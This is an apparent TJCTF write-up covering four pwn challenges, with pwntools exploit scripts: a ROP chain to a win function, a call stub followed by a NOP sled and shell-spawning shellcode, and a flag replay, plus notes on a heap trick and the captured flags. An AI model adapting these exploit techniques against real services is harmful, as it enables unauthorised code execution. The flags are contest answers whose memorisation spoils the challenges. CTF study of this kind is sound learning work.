Heap Challenge
By debugging and reading the source code, you can observe an attack path: changing the size to 0xa0 and then allocating the same size (with 0x98) will print the data 0x20 bytes after the chunk, where the flag should be. tjctf{bby-eap-lol171296386}, exploited manually with netcat
Ring Opening
A simple ROP:
#!/usr/bin/python3
from pwn import *
# GDB script run when the exploit is launched with the GDB flag: break at
# main and let the target run up to it.
gs = "\n".join(["", "b main", "continue", ""])
elf = ELF('./out')
context.binary = elf
# Open the debugger in a tmux split next to the exploit.
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
    """Launch the target.

    Under GDB when ``args.GDB`` is set, against the remote service when
    ``args.REMOTE`` is set, otherwise as a local process. Returns the
    pwntools tube in all three cases.
    """
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    return remote('tjc.tf', 31457) if args.REMOTE else process('./out')
r = start()
r.timeout = 1  # short receive timeout so a failed attempt does not hang the script
#========= exploit here ===================
libc = elf.libc  # NOTE(review): resolved here but never used below
#0x0000000000401016: ret
poprdi = 0x0040117a  # gadget address hard-coded from the binary (presumably `pop rdi; ret`)
ret = 0x401016  # the `ret` gadget noted above; NOTE(review): not used in the payload
# Payload layout: 0x10 bytes of filler, the pop-rdi gadget, a dummy value
# (presumably what gets popped), then the address of win().
payload = b"A"*0x10
payload += p64(poprdi)
payload += p64(0xdeadbeef)
payload += p64(elf.sym.win)
r.sendline(payload)
#========= interactive ====================
r.interactive()
#tjctf{bby-rop-1823721665as87d86a5}
Sled
An easy jmp-and-shellcode challenge:
#!/usr/bin/python3
from pwn import *
# GDB script run when the exploit is launched with the GDB flag: break at
# main and let the target run up to it.
gs = "\n".join(["", "b main", "continue", ""])
elf = ELF('./out')
context.binary = elf
# Open the debugger in a tmux split next to the exploit.
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
    """Launch the target.

    Under GDB when ``args.GDB`` is set, against the remote service when
    ``args.REMOTE`` is set, otherwise as a local process. Returns the
    pwntools tube in all three cases.
    """
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    return remote('tjc.tf', 31456) if args.REMOTE else process('./out')
r = start()
#========= exploit here ===================
# Stage 1: a short stub, assembled by pwntools, that calls the fixed
# address 0x401136 (taken from the binary while debugging).
payload = asm('''
mov rdx, 0x401136
call rdx
''')
print(hex(len((payload))))  # log the stub length; the doubled parentheses are redundant
r.sendline(payload)
# Stage 2: a 0x20-byte NOP sled followed by pwntools' generic shell payload.
payload = b"\x90"*0x20
payload += asm(shellcraft.sh())
r.sendline(payload)
#========= interactive ====================
r.interactive()
#tjctf{bby-shhEellLcodeeeeeaf7af7f66}
WtTwo
You can observe the flag in memory and just send it back to print the flag remotely:
#!/usr/bin/python3
from pwn import *
# GDB script run when the exploit is launched with the GDB flag: break
# 430 bytes into main and let the target run up to it.
gs = "\n".join(["", "b *main +430", "continue", ""])
elf = ELF('./wttwo')
context.binary = elf
# Open the debugger in a tmux split next to the exploit.
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
    """Launch the target.

    Under GDB when ``args.GDB`` is set, against the "remote" endpoint when
    ``args.REMOTE`` is set, otherwise as a local process. Returns the
    pwntools tube in all three cases.
    """
    if args.GDB:
        return gdb.debug('./wttwo', gdbscript=gs)
    # NOTE(review): REMOTE points at 127.0.0.1:5555 — presumably a local copy
    # of the service rather than the contest host; confirm before relying on it.
    return remote('127.0.0.1', 5555) if args.REMOTE else process('./wttwo')
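r = start()
#========= exploit here ===================
# The guess is the flag value observed in memory while debugging (see the
# writeup). One literal replaces the original thirty single-byte
# concatenations; the bytes are identical.
payload = b"tjctf{wt-the-twoooooas48%@dfs}"
# Pad to 30 bytes as the original script did; this is a no-op here because
# the literal is already exactly 30 bytes long.
payload += b"A" * (30 - len(payload))
print(payload)
r.sendlineafter(b"Guess my flag!!", payload)
#========= interactive ====================
r.interactive()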